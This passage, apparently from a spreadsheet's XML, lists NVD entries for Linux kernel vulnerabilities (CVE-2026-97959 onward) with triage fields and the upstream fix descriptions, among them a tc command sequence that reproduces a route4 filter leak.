route4_delete to report *last=false even after the last live filter is
gone. That pins the empty tcf_proto and causes a leak.
Fix this by refcounting the filters linked to a bucket and freeing the
bucket when the count drops to zero. The existing scan in route4_delete
goes away with it.
The count is updated at all sites that link or unlink a filter during add,
change and delete, and the bucket is dropped from head-&gt;table[] as soon as
it reaches zero.
Conditions to recreate the bug:
  CONFIG_NET_CLS_ROUTE4=y, CONFIG_NET_SCH_INGRESS=y, CONFIG_NET_CLS_ACT=y.
  tc qdisc replace dev lo clsact
  tc filter add dev lo ingress protocol ip pref 100 route from 1 to 1
  tc filter change dev lo ingress protocol ip pref 100 handle 0x10001 \
    route from 1 to 2
  tc filter del dev lo ingress protocol ip pref 100 handle 0x10002 \
    route from 1 to 2
  tc filter show dev lo ingress | grep -c 'pref 100 route chain 0 '</t>
        </is>
      </c>
      <c r="T600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97959</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97960</t>
        </is>
      </c>
      <c r="D601" s="5" t="inlineStr"/>
      <c r="E601" s="5" t="inlineStr"/>
      <c r="F601" s="5" t="inlineStr"/>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="inlineStr"/>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q601" s="5" t="inlineStr"/>
      <c r="R601" s="5" t="inlineStr"/>
      <c r="S601" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf/x86/intel: Prevent drain_pebs() reentry
The PEBS buffer is shared by all events on a CPU, so drain_pebs() must
not be reentered. If so, one instance may observe stale buffer state and
potentially access out-of-bound memory.
Most invocations happen in NMI context, which naturally prevents reentry.
However, drain_pebs() is also reachable from process context via
intel_pmu_drain_pebs_buffer().
In those paths, the PMU is often already disabled, but not guaranteed.
For example, __intel_pmu_pebs_disable() only disables the target counter,
so other active counters can still raise a PMI and interrupt an in-flight
drain_pebs(). Here is an example,
__perf_addr_filters_adjust()
  perf_event_stop()
    __perf_event_stop()
      x86_pmu_stop() (event-&gt;pmu-&gt;stop)
        intel_pmu_disable_event()
          intel_pmu_pebs_disable()
            __intel_pmu_pebs_disable()
              intel_pmu_drain_large_pebs()
                intel_pmu_drain_pebs_buffer()
Introduce __intel_pmu_quiesce() and __intel_pmu_resume() helpers and
use them in intel_pmu_drain_large_pebs() to disable the full PMU
around the intel_pmu_drain_pebs_buffer() call, preventing reentry.
Also add a warning in intel_pmu_drain_pebs_buffer() when the full PMU is
not disabled.</t>
        </is>
      </c>
      <c r="T601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97960</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97961</t>
        </is>
      </c>
      <c r="D602" s="5" t="inlineStr"/>
      <c r="E602" s="5" t="inlineStr"/>
      <c r="F602" s="5" t="inlineStr"/>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="inlineStr"/>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q602" s="5" t="inlineStr"/>
      <c r="R602" s="5" t="inlineStr"/>
      <c r="S602" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf/core: Allow list_del during perf_event_overflow()
A PMU might use perf_sched_cb_inc() and perf_sched_cb_dec()
interface to get the PMU call back function pmu::sched_task
invoked at schedule in and schedule out. This is achieved
by walking along the list anchored by sched_cb_list.
The following scenario might lead to a list corruption.
   perf_pmu_sched_task()
      for_each_list_entry(..., &amp;sched_cb_list)
      +--&gt; __perf_pmu_sched_task()
           +--&gt; event-&gt;pmu-&gt;sched_task())
                +--&gt; PMU_push_sample()
                     +--&gt; perf_event_overflow()
                          +--&gt; __perf_event_overflow()
                               +--&gt; pmu-&gt;stop()
                                    +--&gt; perf_sched_cb_dec()
                                         remove entry from sched_cb_list
                                         while list node in use.
This happens when ioctl(fd, PERF_EVENT_IOC_REFRESH, xxx) has been
invoked and perf_event::event_limit hits zero.
Prevent the list corruption and convert for_each_list_entry()
to for_each_list_entry_safe().</t>
        </is>
      </c>
      <c r="T602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97961</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97962</t>
        </is>
      </c>
      <c r="D603" s="5" t="inlineStr"/>
      <c r="E603" s="5" t="inlineStr"/>
      <c r="F603" s="5" t="inlineStr"/>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="inlineStr"/>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q603" s="5" t="inlineStr"/>
      <c r="R603" s="5" t="inlineStr"/>
      <c r="S603" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/mlx5e: Move representor vnic reporter to eswitch devlink port
The representor vnic devlink health reporter is created and destroyed
along the representor netdev (un)load path, which is not serialized by
the devlink instance lock. Destroying the reporter from there triggers
a devl_assert_locked() splat on driver unbind:
  WARNING: net/devlink/core.c:259 at devl_assert_locked+0x54/0x70, CPU#2: bash/3758
  Modules linked in: mlx5_vdpa vringh vdpa mlx5_ib mlx5_fwctl mlx5_core ...
  CPU: 2 UID: 0 PID: 3758 Comm: bash Tainted: G        W           6.19.0+ #1 PREEMPT
  Tainted: [W]=WARN
  Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), ...
  RIP: 0010:devl_assert_locked+0x54/0x70
  Call Trace:
   &lt;TASK&gt;
   devl_health_reporter_destroy+0x3a/0x1b0
   mlx5e_vport_rep_unload+0x12d/0x2b0 [mlx5_core]
   mlx5_eswitch_unregister_vport_reps+0x1b8/0x220 [mlx5_core]
   ? __esw_offloads_unload_rep+0x190/0x190 [mlx5_core]
   ? kernfs_remove_by_name_ns+0xc3/0xf0
   device_release_driver_internal+0x3b2/0x560
   unbind_store+0xce/0xf0
Move the reporter's lifecycle to the eswitch devlink port (un)register
paths, which are already serialized by the devlink instance lock, and
store the handle on mlx5_devlink_port. Use the port's mlx5_vport as the
reporter priv since the diagnose callback only needs a device handle and
a vport number, and mlx5_vport carries both and is initialized before
any representor driver probes.</t>
        </is>
      </c>
      <c r="T603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97962</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97963</t>
        </is>
      </c>
      <c r="D604" s="5" t="inlineStr"/>
      <c r="E604" s="5" t="inlineStr"/>
      <c r="F604" s="5" t="inlineStr"/>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="inlineStr"/>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr"/>
      <c r="L604" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q604" s="5" t="inlineStr"/>
      <c r="R604" s="5" t="inlineStr"/>
      <c r="S604" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: initialize ptp_lock at probe time
priv-&gt;ptp_lock is only initialized in stmmac_ptp_register(), which runs
during __stmmac_open(). However, the lock is also used while the
interface is down and has never been opened: tc_taprio_configure()
invokes the PTP gettime64() callback to compute the EST base time when
offloading a TAPRIO schedule, and stmmac_get_time() takes
priv-&gt;ptp_lock. Using an uninitialized rwlock is undefined behaviour.
Move the rwlock_init() to __stmmac_dvr_probe(), together with the other
private locks, so that ptp_lock is always valid regardless of the
interface state.</t>
        </is>
      </c>
      <c r="T604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97963</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97964</t>
        </is>
      </c>
      <c r="D605" s="5" t="inlineStr"/>
      <c r="E605" s="5" t="inlineStr"/>
      <c r="F605" s="5" t="inlineStr"/>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="inlineStr"/>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K605" s="5" t="inlineStr"/>
      <c r="L605" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q605" s="5" t="inlineStr"/>
      <c r="R605" s="5" t="inlineStr"/>
      <c r="S605" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ppp_synctty: ensure a writeable skb header
ppp_sync_txmunge() checks headroom before prepending the address and
control bytes, but does not ensure that the skb header is writable.
A received skb can reach this function through PPP channel bridging
without passing through ppp_start_xmit(), which calls skb_cow_head().
For example, a PPPoE frame may share its buffer with a clone queued to
an AF_PACKET socket. If it is bridged to a synchronous tty channel, the
address/control bytes can overwrite data still visible to that socket.
Use skb_cow_head() to ensure both sufficient headroom and a writable
header.</t>
        </is>
      </c>
      <c r="T605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97964</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97965</t>
        </is>
      </c>
      <c r="D606" s="5" t="inlineStr"/>
      <c r="E606" s="5" t="inlineStr"/>
      <c r="F606" s="5" t="inlineStr"/>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="inlineStr"/>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K606" s="5" t="inlineStr"/>
      <c r="L606" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q606" s="5" t="inlineStr"/>
      <c r="R606" s="5" t="inlineStr"/>
      <c r="S606" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: initialize _md in vxlan_xmit_one()
If a VXLAN device is configured with both VXLAN_F_COLLECT_METADATA and
VXLAN_F_GBP, and a packet is transmitted through it using an external
ip_tunnel_info that lacks the IP_TUNNEL_VXLAN_OPT_BIT flag, md is left
pointing to the uninitialized _md stack variable:
                if (test_bit(IP_TUNNEL_VXLAN_OPT_BIT, info-&gt;key.tun_flags)) {
                        if (info-&gt;options_len &lt; sizeof(*md))
                                goto drop;
                        md = ip_tunnel_info_opts(info);
                }
Because IP_TUNNEL_VXLAN_OPT_BIT is not set, md is not updated and remains
pointing to _md. Later, vxlan_build_skb() is called with md, which
eventually calls vxlan_build_gbp_hdr():
        if (vxflags &amp; VXLAN_F_GBP)
                vxlan_build_gbp_hdr(vxh, md);
Inside vxlan_build_gbp_hdr(), md-&gt;gbp is read:
        if (!md-&gt;gbp)
                return;
        gbp = (struct vxlanhdr_gbp *)vxh;
        ...
        if (md-&gt;gbp &amp; VXLAN_GBP_DONT_LEARN)
                gbp-&gt;dont_learn = 1;
If the stack contains garbage, this causes:
1) VXLAN_HF_GBP flag to be spuriously set in the VXLAN header.
2) gbp-&gt;dont_learn and gbp-&gt;policy_applied to be set from stack bits.
3) gbp-&gt;policy_id to receive 16 bits of uninitialized kernel stack data,
   leaking it onto the wire.
Fix this by zero-initializing _md. If IP_TUNNEL_VXLAN_OPT_BIT is not
present, md-&gt;gbp remains 0, and vxlan_build_gbp_hdr() returns early
without modifying the VXLAN header.</t>
        </is>
      </c>
      <c r="T606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97965</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97966</t>
        </is>
      </c>
      <c r="D607" s="5" t="inlineStr"/>
      <c r="E607" s="5" t="inlineStr"/>
      <c r="F607" s="5" t="inlineStr"/>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="inlineStr"/>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr"/>
      <c r="L607" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q607" s="5" t="inlineStr"/>
      <c r="R607" s="5" t="inlineStr"/>
      <c r="S607" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
octeontx2-pf: reset HTB scheduler topology before freeing queues
HTB offload programs NIX_AF_TLxX_TOPOLOGY on QoS-allocated scheduler
queues via otx2_qos_txschq_set_parent_topology(), but teardown freed
those queues without clearing TOPOLOGY.  The AF only restores PARENT and
SCHEDULE on free, so PRIO_ANCHOR/RR_PRIO settings can survive in the
shared scheduler pool and affect later allocations.
Add otx2_qos_reset_schq_topology() and otx2_qos_free_hw_schq() to zero
TL4 through TL2 TOPOLOGY before each schq is returned to the AF during
hierarchy teardown and cfg rollback.  Skip the aggregation level (TL1):
it is a per-tx-link queue shared by the PF, default Tx hierarchy and VFs,
and is not freed back to the AF by nix_txschq_free_one().</t>
        </is>
      </c>
      <c r="T607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97966</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97967</t>
        </is>
      </c>
      <c r="D608" s="5" t="inlineStr"/>
      <c r="E608" s="5" t="inlineStr"/>
      <c r="F608" s="5" t="inlineStr"/>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="inlineStr"/>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr"/>
      <c r="L608" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q608" s="5" t="inlineStr"/>
      <c r="R608" s="5" t="inlineStr"/>
      <c r="S608" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (corsair-cpro) Remove debugfs entries when probe fails
ccp_debugfs_init() registers debugfs files whose private data is the devm
allocated ccp.  If hwmon_device_register_with_info() fails right after it,
ccp_probe() returns without removing them: the HID core then frees ccp,
and ccp_remove() is not called for a failed probe, so the files stay
behind.  Reading one of them dereferences the freed pointer.
Remove the debugfs entries on that error path.  debugfs_remove_recursive()
waits for readers already inside the show callbacks, so ccp is no longer
reachable through debugfs by the time probe returns.</t>
        </is>
      </c>
      <c r="T608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97967</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97968</t>
        </is>
      </c>
      <c r="D609" s="5" t="inlineStr"/>
      <c r="E609" s="5" t="inlineStr"/>
      <c r="F609" s="5" t="inlineStr"/>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="inlineStr"/>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr"/>
      <c r="L609" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q609" s="5" t="inlineStr"/>
      <c r="R609" s="5" t="inlineStr"/>
      <c r="S609" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (corsair-cpro) Create debugfs entries after hwmon registration
ccp_debugfs_init() registers debugfs files whose private data is the devm
allocated ccp.  It runs before hwmon_device_register_with_info(), so when
that registration fails, ccp_probe() returns with the files still in
place.  The HID core then frees ccp, and ccp_remove() is not called for a
failed probe, so nothing removes them later either.  Reading one of the
files dereferences the freed pointer.
Create the debugfs entries only after the hwmon device has been
registered, so no failing path can leave them behind.
The two version queries stay where they are.  They send USB commands
without holding ccp-&gt;mutex, which is only safe as long as nothing else
can call send_usb_cmd(); once the hwmon device is registered its
callbacks can do so concurrently.  Only the debugfs creation moves, and
it is told which queries succeeded.</t>
        </is>
      </c>
      <c r="T609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97968</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97969</t>
        </is>
      </c>
      <c r="D610" s="5" t="inlineStr"/>
      <c r="E610" s="5" t="inlineStr"/>
      <c r="F610" s="5" t="inlineStr"/>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="inlineStr"/>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr"/>
      <c r="L610" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q610" s="5" t="inlineStr"/>
      <c r="R610" s="5" t="inlineStr"/>
      <c r="S610" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
watchdog: msc313e: Fix clock leak and spurious timer in settimeout()
msc313e_wdt_settimeout() unconditionally calls msc313e_wdt_start() which
introduces two severe bugs:
1. If the watchdog is already active, calling start() again will
   increase the reference count of the clock again.  However stop() is
   only called once, the reference count is unbalance.
2. If the watchdog is stopped, calling settimeout() will start
   the hardware timer accidentally.
Factor out the register-writing logic into a helper function.  Only call
it in settimeout() if the watchdog is running.  Otherwise, simply update
`wdev-&gt;timeout`.</t>
        </is>
      </c>
      <c r="T610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97969</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97970</t>
        </is>
      </c>
      <c r="D611" s="5" t="inlineStr"/>
      <c r="E611" s="5" t="inlineStr"/>
      <c r="F611" s="5" t="inlineStr"/>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="inlineStr"/>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr"/>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q611" s="5" t="inlineStr"/>
      <c r="R611" s="5" t="inlineStr"/>
      <c r="S611" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
watchdog: msc313e: Avoid division by zero
clk_get_rate() could return 0.  Avoid a division by zero panic.</t>
        </is>
      </c>
      <c r="T611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97970</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97972</t>
        </is>
      </c>
      <c r="D612" s="5" t="inlineStr"/>
      <c r="E612" s="5" t="inlineStr"/>
      <c r="F612" s="5" t="inlineStr"/>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="inlineStr"/>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q612" s="5" t="inlineStr"/>
      <c r="R612" s="5" t="inlineStr"/>
      <c r="S612" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: macb: put the "mdio" child node reference on success
macb_mii_init() holds the reference returned by of_get_child_by_name()
for macb_mdiobus_register() and drops it only on the error paths, so
every successful probe leaks a node reference. On a CM5, overlay
removal after four bind cycles reports
  OF: ERROR: memory leak, expected refcount 1 instead of 5
Drop the reference after registration, where __mdiobus_register() has
already taken its own for the lifetime of the bus.</t>
        </is>
      </c>
      <c r="T612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97972</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97973</t>
        </is>
      </c>
      <c r="D613" s="5" t="inlineStr"/>
      <c r="E613" s="5" t="inlineStr"/>
      <c r="F613" s="5" t="inlineStr"/>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="inlineStr"/>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr"/>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q613" s="5" t="inlineStr"/>
      <c r="R613" s="5" t="inlineStr"/>
      <c r="S613" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: macb: destroy the phylink instance on the probe error path
macb_mii_init() creates a phylink instance on both of its success paths,
but the probe unwind frees the netdev without destroying it, so a failing
macb_alloc_tieoff() or register_netdev() leaks the instance.
Destroy it at err_out_unregister_mdio, which is only reachable once
macb_mii_init() has succeeded, so bp-&gt;phylink is valid there.</t>
        </is>
      </c>
      <c r="T613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97973</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97974</t>
        </is>
      </c>
      <c r="D614" s="5" t="inlineStr"/>
      <c r="E614" s="5" t="inlineStr"/>
      <c r="F614" s="5" t="inlineStr"/>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="inlineStr"/>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr">
        <is>
          <t>github, f5</t>
        </is>
      </c>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q614" s="5" t="inlineStr"/>
      <c r="R614" s="5" t="inlineStr"/>
      <c r="S614" s="5" t="inlineStr">
        <is>
